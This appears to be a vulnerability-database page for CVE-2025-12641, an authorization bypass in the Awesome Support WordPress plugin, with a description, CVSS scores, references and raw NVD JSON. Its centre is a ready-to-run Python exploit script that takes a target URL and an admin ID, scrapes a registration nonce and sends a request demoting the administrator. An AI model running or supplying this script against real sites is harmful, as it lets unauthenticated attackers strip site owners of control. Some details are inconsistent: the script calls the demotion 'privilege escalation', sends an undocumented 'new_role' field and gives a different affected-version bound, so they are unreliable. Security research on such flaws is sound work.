CVE-2025-12641

Description

The Awesome Support - WordPress HelpDesk & Support Plugin for WordPress is vulnerable to authorization bypass due to missing capability checks in all versions up to, and including, 6.3.6. This is due to the 'wpas_do_mr_activate_user' function not verifying that a user has permission to modify other users' roles, combined with a nonce reuse vulnerability where public registration nonces are valid for privileged actions because all actions share the same nonce namespace. This makes it possible for unauthenticated attackers to demote administrators to low-privilege roles via the 'wpas-do=mr_activate_user' action with a user-controlled 'user_id' parameter, granted they can access the publicly available registration/submit ticket page to extract a valid nonce.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Awesome Support Plugin < 6.3.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import re
import argparse

def get_registration_nonce(target_url):
    """Extract valid nonce from public registration page"""
    response = requests.get(f'{target_url}/wp-login.php?action=register')
    if response.status_code == 200:
        match = re.search(r'name="_wpnonce" value="([a-f0-9]+)"', response.text)
        if match:
            return match.group(1)
    return None

def exploit_privilege_escalation(target_url, admin_user_id, nonce):
    """
    Exploit CVE-2025-12641: WordPress Awesome Support Authorization Bypass
    Demote administrator to low-privilege role
    """
    exploit_url = f'{target_url}/'
    
    # Craft POST request to demote admin
    payload = {
        'wpas-do': 'mr_activate_user',
        'user_id': str(admin_user_id),
        'new_role': 'subscriber',
        '_wpnonce': nonce
    }
    
    response = requests.post(exploit_url, data=payload)
    
    if response.status_code == 200:
        print(f'[+] Successfully sent privilege escalation request')
        print(f'[+] Target user ID: {admin_user_id}')
        print(f'[+] New role: subscriber')
        return True
    return False

def main():
    parser = argparse.ArgumentParser(description='CVE-2025-12641 PoC')
    parser.add_argument('--url', required=True, help='Target WordPress URL')
    parser.add_argument('--admin-id', type=int, required=True, help='Admin user ID to demote')
    args = parser.parse_args()
    
    print(f'[*] Target: {args.url}')
    print(f'[*] Fetching registration nonce...')
    
    nonce = get_registration_nonce(args.url)
    if nonce:
        print(f'[+] Nonce obtained: {nonce}')
        exploit_privilege_escalation(args.url, args.admin_id, nonce)
    else:
        print('[-] Failed to obtain nonce')

if __name__ == '__main__':
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12641
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12641
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12641/
[4] VulDB https://vuldb.com/cve/CVE-2025-12641
[5] https://plugins.trac.wordpress.org/browser/awesome-support/tags/6.3.5/includes/functions-actions.php#L36
[6] https://plugins.trac.wordpress.org/browser/awesome-support/tags/6.3.5/includes/functions-actions.php#L66
[7] https://plugins.trac.wordpress.org/browser/awesome-support/tags/6.3.5/includes/functions-user.php#L1686
[8] https://plugins.trac.wordpress.org/browser/awesome-support/tags/6.3.5/themes/default/registration.php#L183
[9] https://plugins.trac.wordpress.org/changeset/3435609/awesome-support/trunk/includes/functions-user.php?contextall=1
[10] https://www.wordfence.com/threat-intel/vulnerabilities/id/a5a8e4ca-c16b-4e9d-8ad2-5a671fdbc49a?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12641", "sourceIdentifier": "[email protected]", "published": "2026-01-16T05:16:04.500", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Awesome Support - WordPress HelpDesk & Support Plugin for WordPress is vulnerable to authorization bypass due to missing capability checks in all versions up to, and including, 6.3.6. This is due to the 'wpas_do_mr_activate_user' function not verifying that a user has permission to modify other users' roles, combined with a nonce reuse vulnerability where public registration nonces are valid for privileged actions because all actions share the same nonce namespace. This makes it possible for unauthenticated attackers to demote administrators to low-privilege roles via the 'wpas-do=mr_activate_user' action with a user-controlled 'user_id' parameter, granted they can access the publicly available registration/submit ticket page to extract a valid nonce."}, {"lang": "es", "value": "El plugin Awesome Support - WordPress HelpDesk & Support para WordPress es vulnerable a un bypass de autorización debido a la falta de comprobaciones de capacidad en todas las versiones hasta la 6.3.6, inclusive. Esto se debe a que la función 'wpas_do_mr_activate_user' no verifica que un usuario tenga permiso para modificar los roles de otros usuarios, combinado con una vulnerabilidad de reutilización de nonce donde los nonces de registro públicos son válidos para acciones privilegiadas porque todas las acciones comparten el mismo espacio de nombres de nonce. Esto hace posible que atacantes no autenticados degraden a los administradores a roles de bajo privilegio a través de la acción 'wpas-do=mr_activate_user' con un parámetro 'user_id' controlado por el usuario, siempre que puedan acceder a la página de registro/envío de tickets disponible públicamente para extraer un nonce válido."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/awesome-support/tags/6.3.5/includes/functions-actions.php#L36", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/awesome-support/tags/6.3.5/includes/functions-actions.php#L66", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/awesome-support/tags/6.3.5/includes/functions-user.php#L1686", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/awesome-support/tags/6.3.5/themes/default/registration.php#L183", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3435609/awesome-support/trunk/includes/functions-user.php?contextall=1", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a5a8e4ca-c16b-4e9d-8ad2-5a671fdbc49a?source=cve", "source": "[email protected]"}]}}